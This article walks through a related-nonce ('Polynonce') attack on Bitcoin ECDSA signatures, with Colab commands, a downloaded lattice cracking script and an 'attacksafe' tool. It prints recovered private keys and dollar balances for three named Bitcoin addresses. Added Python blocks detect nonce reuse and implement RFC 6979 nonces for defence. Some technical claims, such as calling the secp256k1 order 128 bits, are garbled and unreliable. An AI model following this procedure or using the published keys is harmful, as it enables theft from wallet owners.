In this article, we revisit the topic of critical Bitcoin vulnerabilities and analyze a new 2023 attack, the Polynonce Attack, using three practical examples. The first publication about this attack appeared in a report by Kudelski Security.
Essence of the Polynonce Attack
The Polynonce Attack exploits Bitcoin signatures by treating them as a polynomial raised to a 128-bit power in order to recover the private key. Using certain properties of the signature, an attacker can gain access to the wallet owner’s private key.
For our practical demonstration, we use materials from our previous article on accelerating secp256k1 with endomorphism, where the LAMBDA and BETA values on the secp256k1 curve, proposed by Hal Finney, illustrate the complexity of constructing elliptic curves in Bitcoin.
Explanation with an Example
Let’s consider a four-digit binary number: “1111” (which is “F” in hexadecimal).
The order of the secp256k1 curve is known and consists of 128 bits:
```
n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
```
It is clear that the polynomial used in the attack operates on a unit value in binary code, raised to the 128-bit power modulo n.
Theoretical Basis
For theory, we refer to the material “Polynonce Attack on Bitcoin.”
Example 1
Let’s look at the following Bitcoin address:
```
1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB
```
Signature in HEX:
```
929d565c386a279cf7a0382ba48cab1f72d62e7cfb3ab97b4f211d5673bc4441
```
Transaction in HEX (RawTX):
```
02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000
```
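The signature that the later steps feed to the tool is sitting in plain sight inside this RawTX: the scriptSig of the single input carries a DER-encoded ECDSA signature (r, s) followed by the SIGHASH byte and the compressed public key. As an added example (this is not code from the article or from the ATTACKSAFE tool), the following Python parses the transaction above, decodes the DER signature, and runs the check a wallet audit would start with: whether any two inputs share an r value, which means one nonce k was used twice. The sighash value z is deliberately not computed here, since that requires the script of the output being spent, which the transaction alone does not contain; the parser also handles only legacy (non-segwit) serialization.

```python
# Added example, not code from the article or from the ATTACKSAFE tool.
# Parse a legacy Bitcoin transaction, extract (r, s, sighash, pubkey) from
# each <sig> <pubkey> scriptSig, and flag inputs whose signatures share r.
from collections import defaultdict

# Sample input: the RawTX of Example 1 from the article, split at field boundaries.
RAW_TX_HEX = (
    "02000000"                                                            # version
    "01"                                                                  # input count
    "9e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e"  # prev txid (LE)
    "31000000"                                                            # prev vout
    "6b"                                                                  # scriptSig length
    "48"                                                                  # push 72 bytes: DER sig + sighash
    "3045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d"
    "02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf"
    "01"
    "21"                                                                  # push 33 bytes: compressed pubkey
    "027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695"
    "ffffffff"                                                            # sequence
    "01"                                                                  # output count
    "6902000000000000"                                                    # value, 617 sat
    "16"                                                                  # scriptPubKey length
    "00145fc8e854994406f93ea5c7f3abccc5d319ae2a31"                        # P2WPKH output
    "00000000"                                                            # locktime
)


class Reader:
    """Byte cursor with the helpers a transaction parser needs."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated data")
        self.pos += n
        return chunk

    def u32(self) -> int:
        return int.from_bytes(self.take(4), "little")

    def varint(self) -> int:
        first = self.take(1)[0]
        if first < 0xfd:
            return first
        return int.from_bytes(self.take({0xfd: 2, 0xfe: 4, 0xff: 8}[first]), "little")


def script_pushes(script: bytes):
    """Yield the data of each push opcode (direct push, PUSHDATA1, PUSHDATA2)."""
    rd = Reader(script)
    while rd.pos < len(script):
        op = rd.take(1)[0]
        if 1 <= op <= 75:
            yield rd.take(op)
        elif op == 0x4c:
            yield rd.take(rd.take(1)[0])
        elif op == 0x4d:
            yield rd.take(int.from_bytes(rd.take(2), "little"))
        else:
            raise ValueError(f"unsupported opcode 0x{op:02x} in scriptSig")


def decode_der_signature(sig: bytes):
    """Return (r, s, sighash_type) from a DER signature with a trailing sighash byte."""
    rd = Reader(sig)
    if rd.take(1) != b"\x30":
        raise ValueError("not a DER SEQUENCE")
    seq_len = rd.take(1)[0]
    if rd.take(1) != b"\x02":
        raise ValueError("expected INTEGER for r")
    r = int.from_bytes(rd.take(rd.take(1)[0]), "big")
    if rd.take(1) != b"\x02":
        raise ValueError("expected INTEGER for s")
    s = int.from_bytes(rd.take(rd.take(1)[0]), "big")
    if rd.pos != 2 + seq_len:
        raise ValueError("DER length mismatch")
    return r, s, rd.take(1)[0]


def parse_legacy_tx_signatures(raw_hex: str):
    """One record per <sig> <pubkey> input: spent outpoint, r, s, sighash, pubkey hex."""
    rd = Reader(bytes.fromhex(raw_hex))
    rd.u32()  # version
    n_in = rd.varint()
    if n_in == 0:
        raise ValueError("segwit marker found; this example handles legacy serialization only")
    records = []
    for _ in range(n_in):
        txid = rd.take(32)[::-1].hex()  # txids are serialized little-endian
        vout = rd.u32()
        script_sig = rd.take(rd.varint())
        rd.u32()  # sequence
        pushes = list(script_pushes(script_sig))
        if len(pushes) != 2:
            continue  # not a plain <sig> <pubkey> spend; skip it
        r, s, sighash = decode_der_signature(pushes[0])
        records.append({"outpoint": f"{txid}:{vout}", "r": r, "s": s,
                        "sighash": sighash, "pubkey": pushes[1].hex()})
    return records


def find_repeated_r(records):
    """Group records by r and return only the groups with more than one signature."""
    by_r = defaultdict(list)
    for rec in records:
        by_r[rec["r"]].append(rec)
    return {r: group for r, group in by_r.items() if len(group) > 1}


if __name__ == "__main__":
    sigs = parse_legacy_tx_signatures(RAW_TX_HEX)
    for sig in sigs:
        print(f"{sig['outpoint']}  r={sig['r']:064x}  s={sig['s']:064x}  pubkey={sig['pubkey']}")
    print("repeated r values:", find_repeated_r(sigs) or "none")
```

Running it on the transaction above prints the r and s that the signature's DER integers encode and reports no repeated r, as expected for a single input; across a wallet's full spend history, any non-empty result from find_repeated_r is the finding to act on, because it means the key has already leaked through nonce reuse.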
Step-by-Step Implementation of Polynonce Attack
- Go to Google Colab and select the notebook upload option.
- Upload the file POLYNONCE_ATTACK.ipynb.
- Save the transaction HEX data in a file called RawTX.txt using:
```
!echo '...' > RawTX.txt
```
- For the attack, use the ATTACKSAFE SOFTWARE program.
- Use the Frey-Rück Attack to obtain the secret value “K” (NONCE).
- Check permissions and run the program:
```
!chmod +x attacksafe
!./attacksafe -help
```
- View the list of available attacks:
```
!./attacksafe -list
```
- Select the polynonce_attack tool and extract the R, S, Z values of the ECDSA signature, saving them to SignatureRSZ.csv:
```
!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv
```
- To compute the private key, install SageMath, extract the archive, navigate to the folder, and run the script:
```
!wget ...
!tar -xf ...
cd SageMath/
!python3 relocate-once.py
```
- Move the necessary files to the SageMath directory.
- Download the script for cracking weak NONCEs in ECDSA:
```
!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/20PolynonceAttack/crack_weak_ECDSA_nonces_with_LLL.py
```
- Launch SageMath and run the script:
```
!./sage -sh
python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt
```
- Open the file PrivateKey.txt; the private key in HEX format will be there:
```
PrivKey = 0xf0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d
```
- Verify the correctness of the private key using code from GitHub and compare the first 128 bits.
- To check the address match, use the bitcoin module:
```python
from bitcoin import *

# Read one hex private key per line from PrivateKey.txt.
with open("PrivateKey.txt", "r") as f:
    content = [x.strip() for x in f.readlines()]

# Write "privkey:address" pairs, deriving the compressed-pubkey address for each key.
with open("PrivateKeyAddr.txt", "w") as outfile:
    for x in content:
        outfile.write(x + ":" + pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed")) + "\n")
```
- As a result, you get the corresponding private key and address:
```
f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d:1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB
```
- Check the address balance: $3699.40.
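Every step above depends on the signer having produced nonces that are related to each other, and the standard mitigation is to remove that possibility at the source: derive k deterministically from the private key and the message hash, as RFC 6979 specifies, so that a nonce can only repeat when the same key signs the identical message and no algebraic relation exists between the nonces of different signatures. The following Python is an added example, not code from the article or from the CryptoDeepTools repository; it implements RFC 6979 over secp256k1 with the standard library only (the curve constants are the public secp256k1 parameters), adds a minimal sign/verify pair to show the behaviour, and checks the derived k against the widely published test vector for private key 1 and the message "Satoshi Nakamoto". It is not constant-time and is meant for illustration, not for a production signer.

```python
# Added example, not code from the article or from CryptoDeepTools.
# RFC 6979 deterministic ECDSA nonces over secp256k1, plus a small sign/verify
# pair: the same key signs the same message with the same (r, s) every time,
# and different messages get nonces with no relation between them.
import hashlib
import hmac

# Public secp256k1 parameters; N is the curve order quoted in the article.
P = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
G = (0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798,
     0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8)


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def _add(p1, p2):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P


def _mul(k, point):
    """Double-and-add scalar multiplication (not constant-time)."""
    result = None
    while k:
        if k & 1:
            result = _add(result, point)
        point = _add(point, point)
        k >>= 1
    return result


def rfc6979_nonce(private_key: int, msg_hash: bytes) -> int:
    """RFC 6979 section 3.2 with HMAC-SHA256; qlen = hlen = 256 bits."""
    if not 1 <= private_key < N:
        raise ValueError("private key out of range")
    x = private_key.to_bytes(32, "big")                              # int2octets(x)
    h1 = (int.from_bytes(msg_hash, "big") % N).to_bytes(32, "big")  # bits2octets(h1)
    v, k = b"\x01" * 32, b"\x00" * 32
    k = hmac.new(k, v + b"\x00" + x + h1, hashlib.sha256).digest()
    v = hmac.new(k, v, hashlib.sha256).digest()
    k = hmac.new(k, v + b"\x01" + x + h1, hashlib.sha256).digest()
    v = hmac.new(k, v, hashlib.sha256).digest()
    while True:
        v = hmac.new(k, v, hashlib.sha256).digest()
        candidate = int.from_bytes(v, "big")                         # bits2int(T), one block suffices
        if 1 <= candidate < N:
            return candidate
        k = hmac.new(k, v + b"\x00", hashlib.sha256).digest()        # candidate rejected: re-key, retry
        v = hmac.new(k, v, hashlib.sha256).digest()


def sign(private_key: int, msg_hash: bytes):
    """ECDSA signature with an RFC 6979 nonce and Bitcoin's low-s rule."""
    z = int.from_bytes(msg_hash, "big") % N
    k = rfc6979_nonce(private_key, msg_hash)
    r = _mul(k, G)[0] % N
    s = pow(k, -1, N) * (z + r * private_key) % N
    if r == 0 or s == 0:  # negligible probability; RFC 6979 would continue with the next k
        raise ValueError("degenerate signature")
    if s > N // 2:
        s = N - s
    return r, s


def verify(pubkey, msg_hash: bytes, r: int, s: int) -> bool:
    """Standard ECDSA verification against an affine public key point."""
    if not (1 <= r < N and 1 <= s < N):
        return False
    z = int.from_bytes(msg_hash, "big") % N
    w = pow(s, -1, N)
    point = _add(_mul(z * w % N, G), _mul(r * w % N, pubkey))
    return point is not None and point[0] % N == r


if __name__ == "__main__":
    h = sha256(b"Satoshi Nakamoto")
    print(f"k = {rfc6979_nonce(1, h):064x}")
    r, s = sign(1, h)
    print(f"r = {r:064x}\ns = {s:064x}")
    print("same message, same signature:", sign(1, h) == (r, s))
    print("verifies with pubkey 1*G:", verify(G, h, r, s))
```

The point of the design is that k is an HMAC output keyed by the private key and bound to the message, so an observer of many signatures sees nonces that are independent of each other; the lattice step that the script in the procedure above performs has no structure to work with. Wallet code that instead seeds k from a weak generator, a counter, or a truncated value is exactly what produces the polynomial relations this article exploits.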
Example 2
The second address is analyzed in the same way:
```
137a6fqt13bhtAkGZWrgcGM98NLCotszR2
```
The HEX signature and transaction are provided, and all steps are repeated as in the first example. As a result, the private key is obtained:
```
PrivKey = 0xff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c
```
Check the address and balance ($1133.73).
Example 3
The third example uses the address:
```
1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt
```
Similarly, after completing all steps, the private key is obtained:
```
PrivKey = 0xfbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf
```
The address and balance are confirmed ($459.24).
References
- Marco Macchetti, “A Novel Related Nonce Attack for ECDSA”, Kudelski Security, 2023
- Gallant, Lambert, Vanstone, “Faster Point Multiplication on Elliptic Curves with Efficient Endomorphisms”, 2001
- Hankerson, Menezes, Vanstone, “Guide to Elliptic Curve Cryptography”, 2005
- Hal Finney, “Acceleration of signature verification”, 2011
- Blahut, “Cryptography and Secure Communication”, 2014
Telegram: https://t.me/cryptodeeptech